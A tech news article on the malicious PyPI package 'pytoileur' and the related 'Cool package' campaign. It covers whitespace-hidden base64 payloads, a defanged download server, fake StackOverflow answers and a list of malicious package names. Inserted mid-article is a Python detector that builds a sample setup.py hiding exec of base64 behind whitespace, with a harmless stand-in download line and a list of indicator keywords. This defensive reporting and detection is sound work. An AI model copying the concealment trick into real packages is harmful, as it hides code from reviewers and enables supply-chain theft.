Ryan Daws is a senior editor at TechForge Media with over a decade of experience in crafting compelling narratives and making complex topics accessible. His articles and interviews with industry leaders have earned him recognition as a key influencer by organisations like Onalytica. Under his leadership, publications have been praised by analyst firms such as Forrester for their excellence and performance. Connect with him on X (@gadget_ry) or Mastodon (@gadgetry@techhub.social)
Sonatype has exposed ‘pytoileur’, a malicious PyPI package designed to download and install trojanised Windows binaries capable of surveillance, establishing persistence, and stealing cryptocurrency. This discovery is part of a broader, months-long “Cool package” campaign aimed at infiltrating the coding community.
Yesterday, an automated malware detection system operated by Sonatype, known as the Sonatype Repository Firewall, flagged a newly published PyPI package called “pytoileur.” The malicious package, tracked as sonatype-2024-1783, had registered 264 downloads since its release before Sonatype alerted PyPI administrators to remove it.
The package described itself as a “Cool package.” with an HTML description claiming it to be “an API Management tool written in Python.” Intriguingly, it included a reference to “pystob,” a now-defunct package, indicating an attempt at typosquatting to deceive users of legitimate packages like “Pyston.”
Concealed malware
At first glance, the “setup.py” file within “pytoileur” seemed clean, but Sonatype security researcher Jeff Thornhill uncovered malicious code cleverly hidden with excessive white spaces.
“While the base64 encoding is pretty standard in applications and doesn’t offer much in terms of masquerading malicious code, the author had attempted to ‘hide’ this particular encoded string from manual human review by injecting it after a print statement, and then including a paragraphs’ length of whitespace prior to the code,” Thornhill explained.
The base64-encoded payload was designed to target Windows users. It used Python commands to download a malicious executable from an external server (hxxp://51.77.140[.]144:8086/dl/runtime). The malicious binary, “Runtime.exe,” is executed using Windows PowerShell and VBScript commands. This executable employs anti-detection measures to avoid scrutiny and installs additional spyware capable of persistence, including info-stealing and crypto-jacking functionalities.
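The hiding trick described above (a base64 string pushed behind a print() and a long run of whitespace, then passed to exec) is simple to scan for. The following detector is an added example, not Sonatype's tooling or the package's code; the setup.py it scans is constructed here, and its encoded text is a harmless comment-only stand-in that is decoded but never executed.

```python
import base64
import binascii
import re

# Constructed sample in the style the article describes: an innocent-looking
# setup.py whose last statement hides exec() of a base64 string behind a
# print() call and a long run of spaces. The encoded text is a harmless
# stand-in (a comment string carrying typical indicator words) and is never run.
STANDIN = ("# constructed stand-in: urllib.request.urlretrieve("
           "'http://example.invalid/dl/runtime', 'Runtime.exe'); powershell ...")
SAMPLE_SETUP_PY = (
    "from setuptools import setup\n"
    "setup(name='cool-package', version='1.0.0', description='Cool package.')\n"
    "print('Installing...');" + " " * 400
    + "exec(__import__('base64').b64decode('"
    + base64.b64encode(STANDIN.encode()).decode() + "'))\n"
)
CLEAN_SETUP_PY = "from setuptools import setup\nsetup(name='ok', version='0.1')\n"

WS_RUN = re.compile(r"\S[ \t]{40,}\S")            # code, a long gap, then more code
B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")
INDICATORS = ("urlretrieve", "urlopen", "http://", "https://",
              "powershell", "cscript", ".vbs", "subprocess", "exec(")

def decoded_indicators(blob):
    """Decode a base64 literal and return the indicator words found inside it."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore").lower()
    except (binascii.Error, ValueError):
        return []
    return [word for word in INDICATORS if word in text]

def find_hidden_code(source):
    """Scan setup.py text; return (lineno, reason) findings for the tricks above."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        if WS_RUN.search(line):
            findings.append((lineno, "code hidden behind a long whitespace run"))
        if "exec(" in line and "b64decode" in line:
            findings.append((lineno, "exec() of base64-decoded content"))
        for blob in B64_LITERAL.findall(line):
            hits = decoded_indicators(blob)
            if hits:
                findings.append((lineno, "decoded base64 contains: " + ", ".join(hits)))
    return findings

if __name__ == "__main__":
    for lineno, reason in find_hidden_code(SAMPLE_SETUP_PY):
        print(f"line {lineno}: {reason}")
```

A repository firewall or pre-install hook can run this over setup.py before a build ever executes it; a clean file produces no findings, while the sample produces three on its last line.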
Targeting developers through StackOverflow
Ax Sharma, a researcher at Sonatype, discovered that the threat actor behind the ‘pytoileur’ malicious PyPI package is posting fake answers on StackOverflow, urging people to install the harmful package.
This concern is magnified by the large presence of novice developers on StackOverflow, who are still learning and may fall victim to malicious advice.
Connection to ‘Cool package’
Further investigation revealed that “pytoileur” is part of a broader campaign linked to previously identified malicious packages. These packages, often described merely as “Cool package,” have employed similar deception techniques since 2023. They disguise themselves as API management tools or simplified versions of well-known utilities, targeting developers in various niches, including AI and machine learning.
One of the previous packages, “gpt-requests,” which appeared to target AI developers, also hid malicious payloads using whitespace. Similar to “pytoileur,” these payloads download trojanised binaries intended for spying and data theft.
The “lalalaopti” package is particularly noteworthy as it contained plaintext Python code modules for clipboard hijacking, keylogging, remote webcam access, and screenshot capture, further highlighting the malicious intent of the threat actors behind this campaign.
Sonatype and Checkmarx researchers have identified several malicious packages linked to this campaign, including:
- gogogolokl
- gpt-requests
- kokokoako
- lalalaopti
- pybowl
- pyclack
- pyefflorer
- pyhjdddo
- pyhulul
- pyioapso
- pyjio
- pyjoul
- pykokalalz
- pykooler
- pyktrkatoo
- pylioner
- pyminor
- pyowler
- pypiele
- pystallerer
- pystob
- pytarlooko
- pytasler
- pytoileur
- pywolle
- pywool
The resurgence of the “Cool package” campaign through “pytoileur” demonstrates the persistent threats posed by malicious actors in software development environments. As similar threats emerge, Sonatype says it will continue to expand its blocklists and safeguard the developer community.